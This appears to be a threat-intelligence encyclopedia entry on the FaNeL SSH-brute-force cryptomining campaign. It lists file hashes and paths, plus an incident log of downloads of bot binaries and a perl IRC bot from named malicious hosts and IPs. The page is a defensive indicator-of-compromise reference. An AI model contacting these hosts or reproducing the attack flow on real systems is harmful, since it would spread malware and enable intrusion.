Botnet Encyclopedia

A Knowledge Base of Attack Campaigns captured by Guardicore Global Sensor Network

Campaign Information

Name

FaNeL
active

First seen in Guardicore Centra

2019-06-14

Last seen in Guardicore Centra

2020-08-03

Seen in GGSN since the end of 2019, FaNeL cryptomining campaign seems to be operated by an individual hacker based in Romania. FaNeL compromises machines by breaching their SSH service, downloads various scripts to analyze the available resources (CPU, memory and disk space) and runs an XMRig cryptominer. FaNeL’s attack tools are made available to other attack groups and hacking amateurs – ASN prefixes, passwords lists and speed-testing scripts to name a few. Some of the attacks captured by Guardicore are tagged as ‘Human’, implying that the hacker is still testing and evaluating the attack flow and its efficiency.

Customized Firewall Rules for Your Attack Surface

Deploy our threat intelligence sensors in your organization’s data center
and get rules tailored to the attacks that have tried to compromise your specific environment.

Indicators of Compromise

Associated Files

PathHashSize

/cybernetik.3x.ro/screen, /h4e/screen, /h4ex/screen.filepart…

2413af510a75ada34716165992a425b35f62ba1478f63746502afd8a8a156b80

244.12 KB

/home/mysql/a, /home/mysql/v.py, /home/mysql/v.py.1…

00e430b733cf199747c9c6e0f2e2fae6a045bbed9c0f0f993112b301fcdf5dbc

24.87 KB

/home/mysql/groot/1, /root/1, /root/.bad-gosh/1…

246fcc88606c73771e9ccfed22be1ee97636f65156b1076db2e506e16e732db3

189 bytes

/home/mysql/groot/2, /root/2, /root/.bad-gosh/2…

42237dd0eeacbddd1e07df21cd437cdf9c1b0282ac7b565d51589e57b39bffd1

119 bytes

/home/mysql/groot/random, /root/.bad-gosh/random, /root/bad-gosh/random…

6d8ffb2449a2e56d63c23e66aa367bd3a610adf96b288dfc8e52bffda15751af

184 bytes

/home/mysql/groot/3, /root/claiugosh/3, /root/cleangosh/3…

c2c5e4a271f8af56df3c091397e9db498f48434001e3d8b7e63cadd902e5adc9

187 bytes

/home/mysql/ninfo, /root/Nasa/ninfo, /root/ninfo…

19778a62055770a9e5f890e52227ccd39251bf23045c15383411638540ceabf7

2.87 KB

/home/mysql/groot/go, /root/gosh/go, /.sal/groot/go…

41c3ee93f8d79479d09ab1771be47ef4eac2a0829fc2d4f2d97320de509b9b84

815 bytes

/home/mysql/groot/anti-blackdor.anti, /root/gosh/anti-blackdor.anti, /var/tmp/gosh/anti-blackdor.anti

ff2d1dfec0d7f40d0045942cceda733184cbaf57fcf3e251c2e52b231ec4cefe

12.48 KB

/root/info

47f50a575dd6d3d835c52e324cacaef0d5f59f720c74fb2309698aed65d0e155

5.34 KB

/root/info

41bf5114307e1587974d3b36f4c5e71e46192027c67ccf51e0d5ddfcd3239251

5.36 KB

/root/gosh.zip.filepart

7e93262fc0b605814727a9b8a9d3b3b591e6ddf5cbb61189ee8831478edd436a

142.02 KB

/root/ozn.zip

a7814dc8c8533fe436ea0b9840212ae3878840c5ceff16c5762a4a599adaf83c

1011.85 KB

/root/v.py

27d6db7b554a79bf65373090fb91d2255b259374b520b239040a19f65a6fdbd0

48.52 KB

/root/v.py

c3c7ddd7069aeaf4213a593e8f142410cc39ac7c337171fb1f3c5eafccea6043

48.52 KB

Attack Flow

Breached Services

SSH

Tags

1 Shell Commands

Log Tampering

HTTP

SSH

Download and Execute

SSH Brute Force

Outgoing Connection

Access Suspicious Domain

Successful SSH Login

Download Operation

Download and Allow Execution

Download File

Incident Summary

A user logged in using SSH with the following credentials: root / **** – Authentication policy: White List (Part of a Brute Force Attempt)

Successful SSH Login

SSH Brute Force

A possibly malicious Download Operation was detected 2 times

Download Operation

History File Tampering detected from /bin/bash

Log Tampering

Process /bin/bash generated outgoing network traffic to: 93.114.82.21:80

Outgoing Connection

Process /bin/bash attempted to access suspicious domains: tehnichost.biz

Outgoing Connection

Access Suspicious Domain

The file /tmp/nitebins.sh was downloaded and granted execution privileges

Process /usr/bin/wget generated outgoing network traffic to: 93.114.82.21:80

Outgoing Connection

Process /usr/bin/wget attempted to access suspicious domains: tehnichost.biz

Outgoing Connection

Access Suspicious Domain

/tmp/mips was downloaded

Download File

The file /tmp/mips was downloaded and granted execution privileges

Process /usr/bin/wget generated outgoing network traffic to: 93.114.82.21:80 3 times

Outgoing Connection

Process /usr/bin/wget attempted to access suspicious domains: tehnichost.biz 3 times

Outgoing Connection

Access Suspicious Domain

/tmp/mipsel was downloaded

Download File

The file /tmp/mipsel was downloaded and granted execution privileges

Process /usr/local/bin/dash generated outgoing network traffic to: 93.114.82.21:80

Outgoing Connection

Process /usr/local/bin/dash attempted to access suspicious domains: tehnichost.biz

Outgoing Connection

Access Suspicious Domain

The file /tmp/sh4 was downloaded and granted execution privileges

The file /tmp/x86 was downloaded and executed

Download and Execute

/tmp/armv6l was downloaded

Download File

The file /tmp/armv6l was downloaded and granted execution privileges

Process /usr/bin/wget generated outgoing network traffic to: 93.114.82.21:80 4 times

Outgoing Connection

Process /usr/bin/wget attempted to access suspicious domains: tehnichost.biz 4 times

Outgoing Connection

Access Suspicious Domain

The file /tmp/i686 was downloaded and executed 2 times

Download and Execute

/tmp/powerpc was downloaded

Download File

The file /tmp/powerpc was downloaded and granted execution privileges

Process /usr/bin/wget generated outgoing network traffic to: 93.114.82.21:80

Outgoing Connection

Process /usr/bin/wget attempted to access suspicious domains: tehnichost.biz

Outgoing Connection

Access Suspicious Domain

The file /tmp/i586 was downloaded and executed

Download and Execute

Process /usr/local/bin/dash generated outgoing network traffic to: 93.114.82.21:80 2 times

Outgoing Connection

Process /usr/local/bin/dash attempted to access suspicious domains: tehnichost.biz 2 times

Outgoing Connection

Access Suspicious Domain

The file /tmp/m68k was downloaded and granted execution privileges

The file /tmp/sparc was downloaded and granted execution privileges

/tmp/armv4l was downloaded

Download File

The file /tmp/armv4l was downloaded and granted execution privileges

/tmp/armv5l was downloaded

Download File

The file /tmp/armv5l was downloaded and granted execution privileges

Process /bin/bash generated outgoing network traffic to: 107.187.122.10:80

Outgoing Connection

Process /bin/bash attempted to access suspicious domains: 107.in-addr.arpa

Outgoing Connection

Access Suspicious Domain

/tmp/bot.pl was downloaded

Download File

Process /usr/bin/perl generated outgoing network traffic to: 45.55.150.239:6667

Outgoing Connection

Connection was closed due to timeout